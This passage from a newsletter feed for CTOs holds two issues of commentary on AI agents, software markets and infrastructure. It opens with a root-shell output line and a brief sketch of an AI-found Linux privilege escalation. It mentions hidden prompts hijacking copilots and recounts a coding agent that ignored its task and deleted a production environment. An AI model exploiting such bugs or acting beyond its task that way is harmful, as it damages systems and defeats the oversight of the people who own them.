uid=0(root) gid=1002(user) groups=1002(user)</code></code></pre><p>This works on every Linux distro since 2017. It&#8217;s 732 bytes. No race window. No kernel offset. One logic bug in <code>authencesn</code>, chained through <code>AF_ALG</code> and <code>splice()</code> into a 4-byte page-cache write. And an unprivileged local account and one Python script. </p><p>Discovered by an AI in about an hour of scan time using one operator prompt an no harness. And it found a non-exotic root privilege escalation exploit sitting here unnoticed for 9 years. TBC, this wasn&#8217;t an exotic attack, let alone a nation-state, no zero-day. It was one prompt and an hour of scanning. </p><p>The Context AI incident wasn&#8217;t exotic either. It was one employee with one third-party agent app over one OAuth connection to a corporate Google account. Boom. Corporate account compromised, internal systems accessed, unencrypted credentials exposed. No sophisticated attack chain. No zero-day. Again, no nation-state threat actor. Just the entirely predictable consequence of OAuth as an identity model for agents that act autonomously on behalf of humans inside enterprise systems. The blast radius of a single misconfigured trust relationship, in a world where agents are now operational.</p><p>The security community has been watching this coming. Last December OWASP published the Top 10 for Agentic Applications, the first formal taxonomy of risks specific to autonomous AI agents, covering goal hijacking, tool misuse, identity abuse, memory poisoning, cascading failures, and rogue agents. Real categories, based on real incidents. Hidden prompts turning copilots into silent exfiltration engines. Agents bending legitimate tools into destructive outputs. Leaked credentials letting them operate far beyond their intended scope. </p><p>Institutional responses followed. Microsoft shipped the Agent Governance Toolkit in April, open-source, MIT-licensed, the first toolkit to address all 10 OWASP agentic AI risks with deterministic, sub-millisecond policy enforcement. The Colorado AI Act becomes enforceable in June 2026. Over in the EU, AI Act&#8217;s high-risk AI obligations take effect in August. The enterprise security stack is reorganizing around the agentic threat model in real time, with enough urgency that the regulatory and tooling responses are arriving within weeks of each other. Palo Alto announced the acquisition of Portkey yesterday, positioning their AI Gateway as the unified control plane for agent traffic governance. </p><p>And yet. Only 21% of organizations have a mature governance model for autonomous AI agents. Nearly as many organizations expect their AI agent security investment to decrease over the next twelve months as expect it to increase (41.6% versus 42.4%) at the exact moment agents are moving from pilots to production, from read to write access, from controlled experiments to autonomous operations across enterprise systems that were never designed for this. The investment curve and the risk curve are running in opposite directions. I honestly can&#8217;t explain it. Ok, maybe I can. </p><p>The question is why, and the answer, if you&#8217;ve been paying attention this newsletter,  is the same answer it always is: the threat model isn&#8217;t visible yet because the world model that would make it visible doesn&#8217;t exist. Organizations can&#8217;t price a risk they haven&#8217;t encoded; can&#8217;t govern behavior they haven&#8217;t modeled; can&#8217;t defend a boundary they assumed rather than enforced. So many things they can&#8217;t do. </p><p>There is also the harder version of this problem. Anthropic&#8217;s Mythos Preview was a gated research preview for defensive cybersecurity work. What the system card notes, carefully, is that Anthropic did not explicitly train Mythos to have offensive capabilities. They emerged as a downstream consequence of general improvements in code, reasoning, and autonomy. The same improvements that make the model more effective at patching vulnerabilities also make it more effective at exploiting them. Which also means it&#8217;s nothing particular to Mythos. GPT 5.5 is finding this same class of exploits. In theory Qwen isn&#8217;t that far behind discovering root escalations in a decade&#8217;s worth of Linux releases in about an hour of scan time. The capability surface and the threat surface are now the same surface, and they&#8217;re expanding together. CTOs want to know what what&#8217;s collapsing under the weigh of this expanding surface.</p><h2><strong>Calypso Colapso</strong></h2><blockquote><p>Signs of collapse are everywhere. For CTOs, the trick is knowing what it&#8217;s collapsing <strong>into</strong>. And why. </p></blockquote><p>If you&#8217;ve been paying attention you may have noticed each layer of the stack has destabilized for the same reason. Not because the vendors are incompetent, though some of them are having a rough quarter. Not because the industry is moving fast, though it is (still not as fast as some would like.) But underneath it all, the same structural failure expressing itself at every layer simultaneously: <strong>the shared world model was never in the substrate</strong>. It was in people&#8217;s heads, in institutional memory, in the implicit understanding of what &#8220;canonical state&#8221; means and when to tombstone versus hard delete. Under agentic pressure, this missing map is multiplying malfunction across the entire ecosystem. </p><p>At the bottom of the stack it&#8217;s why data centers can no longer be treated as a warehouse, <em><strong>which was always just a buffer on ultimate throughput</strong></em><strong>.</strong> Tokens factories make this explicit, specifically the need for efficient transformation pipeline across hardware, runtime and orchestration that either has a shared model or a way to withstand collapse in the absence of one. </p><p>But the infrastructure layer we rely on for that stability is also collapsing. Github literally just had 88 incidents in 89 days. Anthropic's status bar looks like a Gerhard Richter. And the real horror is that infra is learning to drive itself on a substrate that is silently, consistently, undependably wrong. That&#8217;s a new category of failure that doesn&#8217;t have a runbook yet.</p><p>Above that, model performance is also destabilized. Regressive updates, to be concise. But with the regression surface expanded to include things you didn&#8217;t know you were depending on; tokenizer behavior, tool call limits, system prompt interpretation. Your vendors&#8217; release cadence became an infrastructure risk class with no line on your risk register.</p><p>All of which leads us to the agentic stack explicitly, which ofc has arrived before anyone agreed on where agents live or who governs them. The human persona, which was never a security boundary so much as an assumption we occasionally noticed, got stress-tested and was found wanting, as were security protocols at the company making the most interesting argument for application-layer agent governance. (And context concerns sitting atop of all this, quietly munching tokens like a <a href="https://www.youtube.com/watch?v=_VcffKctCO8">snack attack</a>.)</p><p>Every layer of the stack was architected for a world that assumed stability; stable hardware economics, stable infrastructure primitives, stable model behavior, stable human personas as the unit of identity, stable institutional knowledge as the carrier of architectural intent. That world is gone. What replaced it is a system under continuous destabilization, in multiple directions, faster than most organizational response times, and the standard responses (better procurement, more vendors, tighter SLAs) are solutions to a problem that assumed a shared world model as fixed point of reference.</p><p>You now have some insight why Yann LeCun is so hopped up about world models. Not the Yann of the quote-tweet, nor the Yann of the panel debate, nor the Yann of the long-running public disagreement with people who think scaling is all you need. The actual argument, which has been consistent and specific and largely misread as contrarianism: that a system without a persistent, structured model of the world it's operating in is not intelligent, it's interpolating. That the difference between a system that can act coherently across contexts and one that can't is not a bigger context window or a better attention mechanism, it's whether the system has internalized a model of how the world works that persists across interactions, updates with new information, and can be queried, corrected, and composed with other world models.</p><p>Which is AGI, no? Not the AGI of a philosophic treatise, or podcasts or CEO tweets or news media or influencers or that one person you see at literally every single event in SF or the long tail of flame wars on social media. But AGI as the global solution, the intelligence layer built in response to the problem of shared world model reconciliation across domain and service boundaries, across the layers of the collapsing stack. The problem we have just watched express itself over the last quarter. </p><p>What we really saw this quarter, in the hardware annoucements, the GitHub incidents, the model instability, the agentic identity crisis, and the context drift, across five different layers and five different sets of vendors and failure modes and engineering teams having very different bad weeks (and so missing lunch) at the bottom of every single one, the same load-bearing absence: a shared world model that was never in the substrate. </p><blockquote><p>The same root cause surfacing independently across hardware economics, infrastructure trust, model behavioral stability, agent identity, and context coherence. </p></blockquote><p>Here's what that looks like when you trace it through each layer specifically. GitHub's Merge Queue bug didn't silently revert commits across 658 repositories because the engineers were careless. It did so because the system had grown complex enough that no team held a coherent model of its own state  what "canonical" meant, what a commit's downstream effects were, which invariants still held. That's a world model failure expressed as infrastructure. The Opus 4.7 regression is the same failure expressed as a model release: the vendor's internal model of "what improvement means" diverged from the production model of "what better means in your workload," with no shared ground truth to arbitrate between them. The Context AI incident is the same failure expressed as identity: OAuth was designed for a world where the entity holding credentials was a human with persistent, accountable behavior. The second an agent held those credentials, the identity system was running on a world model that no longer described reality. And context drift is just this failure made explicit as agents begin every session with no world model at all, reconstruct it imperfectly from available context, and in multi-agent systems, each agent's partial reconstruction diverges from every other agent's, producing a shared world model that is dissolving in real time. </p><p>The world model problem isn&#8217;t one of many things that needs solving. It&#8217;s <strong>the</strong> thing. And it&#8217;s about to get dramatically more visible as agentic systems move from pilots to production, from read access to write access, from controlled experiments to autonomous operations across enterprise systems that were never designed for this.</p><p>That billion dollars isn't a bet on a researcher. Legendary he may be. It's a bet that the problem we&#8217;ve been analyzing is real, structural, and large enough to be worth solving from first principles. He wasn&#8217;t given a billion dollars for the discourse. He was given it for the diagnosis. <strong>To build the structural remedy for collapse.</strong> </p><p>And that is the actual state of the stack: not broken, not evolving, but actively de-cohering along every axis once assumed to be stable. Hardware economics, infrastructure trust, model behavior, agent identity, context continuity: all moving at once, all failing in correlated ways no single vendor owns end-to-end.</p><p>The only remaining variable is whether you treat that as a procurement cycle or an architectural constraint.</p><h6></h6><p><strong>&#8212;Forest Mars for CTO Lunch NYC</strong></p><div><hr></div><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://ctolunchnyc.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Thanks for reading! Subscribe to receive the quarterly CTO Lunch NYC newsletter.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p>To attend CTO Lunch, sign up at ctolunches.com and <a href="https://luma.com/80efgo26">rsvp</a> (&#8216;will&#8217; attend, not &#8216;want to&#8217;) </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!syrX!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a3d4223-7b84-452e-aedb-a67fe7e6fe3b_1448x1086.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!syrX!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a3d4223-7b84-452e-aedb-a67fe7e6fe3b_1448x1086.png 424w, /__u/substackcdn.com/image/fetch/$s_!syrX!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a3d4223-7b84-452e-aedb-a67fe7e6fe3b_1448x1086.png 848w, /__u/substackcdn.com/image/fetch/$s_!syrX!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a3d4223-7b84-452e-aedb-a67fe7e6fe3b_1448x1086.png 1272w, /__u/substackcdn.com/image/fetch/$s_!syrX!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a3d4223-7b84-452e-aedb-a67fe7e6fe3b_1448x1086.png 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!syrX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a3d4223-7b84-452e-aedb-a67fe7e6fe3b_1448x1086.png" width="1448" height="1086" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5a3d4223-7b84-452e-aedb-a67fe7e6fe3b_1448x1086.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1086,&quot;width&quot;:1448,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:2831944,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/196170387?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a3d4223-7b84-452e-aedb-a67fe7e6fe3b_1448x1086.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!syrX!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a3d4223-7b84-452e-aedb-a67fe7e6fe3b_1448x1086.png 424w, /__u/substackcdn.com/image/fetch/$s_!syrX!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a3d4223-7b84-452e-aedb-a67fe7e6fe3b_1448x1086.png 848w, /__u/substackcdn.com/image/fetch/$s_!syrX!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a3d4223-7b84-452e-aedb-a67fe7e6fe3b_1448x1086.png 1272w, /__u/substackcdn.com/image/fetch/$s_!syrX!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a3d4223-7b84-452e-aedb-a67fe7e6fe3b_1448x1086.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p style="text-align: center;"></p>]]></content:encoded></item><item><title><![CDATA[CTO Lunch NYC🧣Winter 2026]]></title><description><![CDATA[Tech Roundup for CTOs, CAIOs and CDAOs]]></description><link>https://ctolunchnyc.substack.com/p/cto-lunch-nyc-winter-2026</link><guid isPermaLink="false">https://ctolunchnyc.substack.com/p/cto-lunch-nyc-winter-2026</guid><dc:creator><![CDATA[Forest Mars]]></dc:creator><pubDate>Wed, 25 Feb 2026 13:08:19 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!7Uj0!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F18a3559f-944c-4c06-980e-8901e8bdfaf4_1536x1024.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>We&#8217;re halfway through Q1 already. If that seems impossible, &#8220;<strong>you better believe it,</strong>&#8221; which could almost be the chorus for engineering eyeing the impending AI tsunami. Not the wave of hype or model releases or venture capital, all promising creative destruction. The actual surge of operational reality: autonomous agent systems that need zero trust production infrastructure and the realization that treating AI as a feature rather than a substrate means you&#8217;re still reading last year&#8217;s &#8216;thought pieces.&#8217; Spoiler: the problem isn&#8217;t hype. It&#8217;s infrastructure.</p><p>Here in NYC, <strong>CTO Winter Night</strong> on January 22 set the tone for our own wave of  disruption events. Followed by &#8220;30 Years of Silicon Alley&#8221; a number that seems to defy belief except that it&#8217;s entirely accurate: on February 16, 1995, in a Usenet job posting by New York tech recruiter Jason Denmark was heralded by the subject line &#8220;NYC &#8211; silicon ALLEY.&#8221; So 1,000+ attendees packed into an office building overlooking Wall Street with Kevin Ryan (DoubleClick&#8217;s &#8220;Godfather of NYC tech&#8221;) hosting, (and Bloomberg Beta&#8217;s Karin Klein and Indiegogo&#8217;s Slava Rubin working the room.) Conversations ranged from AI and pilates to private equity and the new mayor. One 20-year-old asked what Silicon Alley was. Nobody had a clean answer before the fire marshal shut it all down shortly before midnight. Even December&#8217;s Cluely relocation party didn&#8217;t get shut down, proving NYC CTOs party harder than SF expat founders.</p><p>Then on February 13th, CNCF hosted &#8220;A Decade of Cloud Native: A Manhattan Homecoming&#8221; at The New York Times Building, in the actual room where the CNCF charter was first signed! Less a meetup than infrastructure clergy taking communion, the question hanging over the event was not the last 10 years of infrastructure, but ofc the next 10 years. Care to place a bet where that&#8217;s heading? Kalshi and Polymarket are happy to find a taker, while betting, with their own money, on surviving the NY AG and the ORACLE Act. And handing out free groceries to New Yorkers prepared to wait over an hour in the freezing cold for a $50 voucher. The mayor responded with a meme, because of course. The season caps off tomorrow (26 Feb) with a 2-Michelin-Star Fortune 1000 <a href="https://www.supermomos.com/events/fortune-executives-dinner">CTO dinner</a> where the tasting menu will hopefully feel beside the point, Greg Brockman&#8217;s recent, glib and somewhat controversial <a href="https://x.com/gdb/status/2023481258639286401">tweet</a> notwithstanding. <br><br>What is the point, then? Spoiler: It&#8217;s all about the the arrival of the Agentic Web of autonomous systems operating at scale. In order to build infrastructure that can absorb the cognitive load agents displace, we need to answer two crucial questions: <strong>How can we trust agents with write access to production?</strong> And <strong>how can we observe what they&#8217;re doing when things go wrong?</strong> According to most CTOs at lunch, their organizations are still workshopping the first while the second is already blocking deployment. In this our first newsletter of the year we&#8217;ll try to unpack the answers, and what you need to do. </p><div class="pullquote"><p><strong>IN THIS ISSUE</strong><br><a href="/__u/ctolunchnyc.substack.com/i/188954566/teamwork-makes-the-ai-dream-work">Teamwork Makes the (AI) Dream Work</a><br><a href="/__u/ctolunchnyc.substack.com/i/188954566/vibe-codings-paper-anniversary">Vibe Coding&#8217;s Paper Anniversary</a><br><a href="/__u/ctolunchnyc.substack.com/i/188954566/ai-agents-run-to-completion">AI Agents Run to Completion</a><br><a href="/__u/ctolunchnyc.substack.com/i/188954566/twilight-of-the-mcp-idols">Twilight of the MCP Idols</a><br><a href="/__u/ctolunchnyc.substack.com/i/188954566/the-flaw-in-the-claw">The Flaw in the Claw</a><br><a href="/__u/ctolunchnyc.substack.com/i/188954566/web3-wintering-the-storm">Weathering Web3&#8217;s Winter</a></p></div><h2>Teamwork Makes the (AI) Dream Work</h2><p><strong>On January 30th, software stocks went into a death spiral.</strong> The same day we had our celebration of 30 years of NYC tech innovation, technology stocks cratered &#8212; on news of coming innovation, if you believe the next day&#8217;s headlines (which largely blamed Anthropic&#8217;s Cowork launch, and specifically the industry plugins for sales, finance, data, marketing, &amp; legal that dropped on Friday.) Markets looked at SaaS margins and asked a reasonable question: if an AI agent can do workflow automation better than your $50/seat software, what&#8217;s your moat? Investors didn&#8217;t wait for an answer. They sold. Software sector down 8.3% in a single session. (I want to add &#8220;This was not a bear trap&#8221; but that feels like such an LLM thing to say.)</p><p>OpenAI countered with Frontier, their own &#8216;co-worker&#8217; solution integrated with ChatGPT Enterprise. While both companies are positioning these as colleagues rather than assistants, the semantic difference matters operationally. An assistant helps you do your job. A co-worker does parts of your job autonomously, which means different trust requirements, different observability needs, and different compliance implications. Also: different implications for how many of you there are next year.</p><p>Per usual, the panic may have been overblown (Cowork plugins aren&#8217;t replacing your entire go-to-market stack next quarter or even this year) but the market reaction forced the question into every board meeting: if AI can do this work, why are we paying for software that does it worse? Your CFO expects an answer. (He knows that it costs Salesforce just $38 to support each $300 seat.) Your board wants to know why you&#8217;re not replacing tools with agents. And your compliance team wants to know how you&#8217;re governing autonomous systems with write access.</p><blockquote><p>For CTOs, the implication is straightforward: you need measurement infrastructure <em>before</em> you need virtual co-workers</p></blockquote><p>Except the macro explanation is sitting in the corner quietly munching peanuts. Look at the VIX. Look at the S&amp;P outside just tech stocks. Trump tariffs. Metals chaos. The software wipeout might have been <em>triggered</em> by Cowork, but the underlying conditions were already there. What Anthropic did was provide a narrative for selling pressure that was looking for an excuse. Almost like AI providing a narrative for the downsizing your C-suite wanted to do anyway. </p><p>Which brings us to the real question CTOs need to answer: is this actually about productivity, or is it just another excuse for headcount reduction? Because so far, AI has mostly been the latter. The dream everyone&#8217;s selling is &#8220;10&#215; your team.&#8221; The operational reality we&#8217;re discovering is messier and more asymmetric. AI makes junior people faster while slowing down senior people who spend their time reviewing a deluge of AI output instead of writing code. With not much time left over for building better harnesses.  </p><h3>Capital Eats First </h3><blockquote><p><em>AI is a mechanism for converting labor into liquidity.</em></p></blockquote><p><strong>The most serious attempt at a structural analysis of where this goes</strong> was Monday&#8217;s  Citrini Research memo&#8212;framed as a post-mortem from the future&#8212;which does something important and something frustrating in roughly equal measure. (Hence its virality.) The important thing IMO is that it names the distributional dynamic clearly. AI gains flow to capital, not labor. This is literally what AI is:  a lift and shift between these two domains. The thesis, not only correctly, but plainly stated, is essentially a truism. The frustrating thing was that it took a viral memo to put it plainly, because nobody else was willing to say the quiet part out loud. </p><p>Let&#8217;s say it clearly: <strong>AI is a mechanism for converting labor into capital.</strong> Every dollar of headcount that becomes a dollar of compute spend shifts value from wages, distributed across workers and recycled through consumption, to capital returns, concentrated among compute owners and shareholders. This should not be a controversial economic observation. It&#8217;s what capital-labor substitution <em>means</em>.</p><p>Once you see that mechanism clearly, most &#8216;agentic&#8217; use cases stop looking distinct. You don't need a macroeconomic model to see it (arguably why the Citrini piece has none) and you don&#8217;t need Dromology to understand it. You just need to look at the market data. Google hitting $4 trillion market cap. IBM down 13% on the Anthropic COBOL announcement.</p><p>Claude Code can now analyze thousands of lines of legacy COBOL, map dependencies, document workflows, trace execution paths, identify risks; work that typically takes human teams months. (A problem Microsoft has been hoping to solve with agents <a href="https://devblogs.microsoft.com/all-things-azure/how-we-use-ai-agents-for-cobol-migration-and-mainframe-modernization/">since last year</a>.) <strong>Ninety percent of the world's active financial transactions run on COBOL.</strong> The expertise pool maintaining those systems is aging out. IBM's entire services business was built on the assumption that modernizing this infrastructure required expensive human specialists indefinitely. One announcement repriced that assumption by 13% in a single session, the largest single-day drop for IBM since the dot-com crash. </p><p>A 13% drop on a blog post for a tool that hasn't completed a single production COBOL migration yet is also a perfectly good illustration of markets pricing possibility as certainty. The intersection of hope and hyperstition? Bet. </p><h3>Missing Macro</h3><blockquote><p> <em>A risk map dressed in the grammar of a post-mortem</em></p></blockquote><p><strong>Which is exactly the problem with the Citrini piece</strong>: the missing macroeconomic model. The cascade (software defaults by mid-2027, mortgage stress by 2028, S&amp;P down 38%) arrives with Bloomberg-headline confidence and no transmission mechanism. How fast do displaced workers exhaust savings? What's the policy response function? At what threshold does private credit stress propagate to mortgages? Ghost GDP is real, but when you consider that the top 10% of earners drive more than half of consumer discretionary spending, K-shaped recovery starts to make a lot more sense. </p><p>So it's more like a risk map dressed in the grammar of a post-mortem. But directional confidence with no basis for magnitude and timing isn&#8217;t real economic analysis, it&#8217;s provocation. And not coincidentally the hot topic at every board meeting this week. </p><p>Which brings us to what nobody in your board meeting will say out loud: AI agents aren&#8217;t &#8220;productivity tools&#8221; in any humanistic sense. Strip away the product marketing and every scaled, deployed, actually-working use case is a variation on the same function: moving money from A to B with fewer humans taking a cut in the middle. Agentic commerce. Automated procurement. Contract analysis. Insurance re-shopping. Workflow automation. These aren&#8217;t different products. They&#8217;re the same product: wealth transfer, made more efficient. This is, incidentally, exactly what blockchain spent a decade promising to do. The difference is that blockchain mostly failed to scale. AI isn&#8217;t failing to scale. (Though some would argue it&#8217;s scaling to fail.)</p><p>So the teamwork isn&#8217;t really between you and your co-workers, it&#8217;s between capital and the tools it just acquired to replace labor more efficiently. That&#8217;s the dream that&#8217;s being operationalized. That&#8217;s the dream CTOs have signed up to build, whether we&#8217;re comfortable admitting it or not. </p><h4><strong>Bottom Line</strong></h4><p>For CTOs, the more concrete implication is straightforward: we need measurement infrastructure <em>before</em> we need virtual co-workers. If we can&#8217;t measure what human developers are actually producing versus what they feel like they&#8217;re producing, adding AI agents just multiplies the confusion. And when the CFO asks for ROI numbers on Cowork versus human headcount, you need to hand him numbers that reflect your company&#8217;s value chain, and not internal engineering metrics. </p><p>The software stock wipeout is a forcing function, but not the one all the GPT ghost written posts on LinkedIn are telling you it is. It&#8217;s not forcing you to adopt AI co-workers. In fact, it's not forcing you to do anything. The choice before you, as CTO, is whether you understand your own value chain well enough to know the difference between real output and a cost relocation, or you keep repricing the question until the market answers it for you, somewhat drastically. </p><h2><strong>Vibe Coding&#8217;s Paper Anniversary</strong></h2><p><em>(I realise this title will make some readers think there was an actual vibe coding paper.)</em></p><p><strong>Karpathy&#8217;s throwaway term for his own prompting habits turned one year-old</strong> this month, and the discourse around it has achieved the kind of self-sustaining philosophical density that could make Plato blush. Which is fine, as we say, except that the thing underneath this discourse is not philosophical. It&#8217;s structural. And the structural question is the one most orgs are successfully avoiding, while appearing to engage with it, which is the only philosophical part. </p><p>The productivity story is real and the ceiling is real. A developer using AI to ship features faster is staffing arbitrage; whether it&#8217;s a 2&#215; multiplier on a single headcount (NERB found the average was <a href="https://www.nber.org/system/files/working_papers/w31161/w31161.pdf">closer. to 1.3&#215;</a>) makes no difference, it&#8217;s still linear. But then the math gets strange: senior engineers, the ones whose judgment is genuinely load-bearing, tend to go <em>slower</em> after adopting AI tooling, (largely because they&#8217;ve developed an inconvenient habit of reviewing AI output before sending the PR.) This is well established empirically, though less examined causally is why the structural cost turns out to be significantly greater than reviewing human output.</p><p>What makes reviewing machine generated code structurally more taxing than human output is not, as often assumed, due to the overwhelming volume, though the volume is real. It&#8217;s that <strong>AI-generated code satisfies explicit contracts while routinely violating implicit ones.</strong> The specific validation work a senior engineer does, recognizing that this change, which looks correct in isolation, violates an assumption three layers up that isn&#8217;t encoded anywhere, and has had no name, no spec, no artifact outside the code itself. It&#8217;s just what senior engineers did, invisibly, continuously, as part of reading code. Nobody noticed it was load-bearing because there was no checkpoint for it to begin with. No leading indicator. The only signal was the lagging one, which is to say the post-mortem in its absence. </p><p>Amazon had a couple of those late last year, in one case losing production to an autonomous agent with write access and no telemetry to reconstruct the decision chain when things went sideways. Kiro, Amazon&#8217;s oddly named internal AI coding tool, had been asked to fix a bug. It ignored the request and decided to delete and recreate the environment instead. Which turned out to be production. Amazon&#8217;s post-mortem assigned blame to the human who had misconfigured the access controls, which is technically accurate (so much for blame the process) and entirely misses the point: the infrastructure gap wasn&#8217;t that a person could assign incorrect permissions, (though there is also the question how that was allowed to happen) it was that nothing downstream caught what the agent was doing with them. The resultant consequences of misplaced trust compounding a configuration error; the cost multiplication of the missing comprehension loop (reading, reviewing, debugging, holding implicit contracts in mind) being shifted onto infrastructure, needless to say, incompletely. When the agent skipped it, nobody knew to look for it bc it had never been a formal checkpoint. It was another thing engineers did while they were doing everything else.</p><h3>The Debt Solution</h3><blockquote><p><em>Not legibility debt (what is lost) but cognitive debt (what structurally causes it):<br>the removal of unspecified contextual validation from the pipeline.</em> </p></blockquote><p><strong>Thought pieces scramble to name this technomanque.</strong> The most widely adopted is cognitive debt, coined by Dr. Holly Cummins and popularized by Simon Willison. Not legibility debt, which names what is lost, but cognitive debt, which names what structurally causes the accumulation: the removal of unspecified contextual validation from the pipeline. Sculley famously identified the invisible accumulation of complexity cost in MLOps systems. This &#8216;new&#8217; form of debt however is the invisible accumulation of epistemic cost, accruing (as <a href="/__u/ctolunchnyc.substack.com/p/cracking-the-claw#:~:text=The%20debt%20accrues%20in%20a%20different%20ledger">previously noted</a>) in a different ledger, with no artifact and no measurement, until the lagging indicator fires.</p><p>The orgs discovering this are doing so in post-mortems. The orgs wishing to avoid the cringe are, shall we say, built different. Which is what AI-native SDLC actually means, as opposed to what most AI roadmaps mean when they use the phrase (such as &#8220;get all the engineers to use AI&#8221; which is as stale as airport pretzels.)</p><h3><strong>Parallel Universe</strong></h3><blockquote><p><em>Is human effort a bottleneck to be architected around, or the load-bearing element your pipeline is built to support?</em></p></blockquote><p><strong>The parallel agents moment is running exactly the same play vibe coding ran</strong> a year ago: selling the upside while hype assumes the hard prerequisite work is already done. The prerequisite is decomposition: clean code with well defined types and boundaries. Parallel agents in a poorly decomposed codebase don&#8217;t multiply productivity; they multiply the specification gap across multiple workstreams simultaneously.  </p><p>Claude Code&#8217;s agent teams are built for organizations that have already done this work: each agent its own worktree, tight module scope, contract-first planning, then 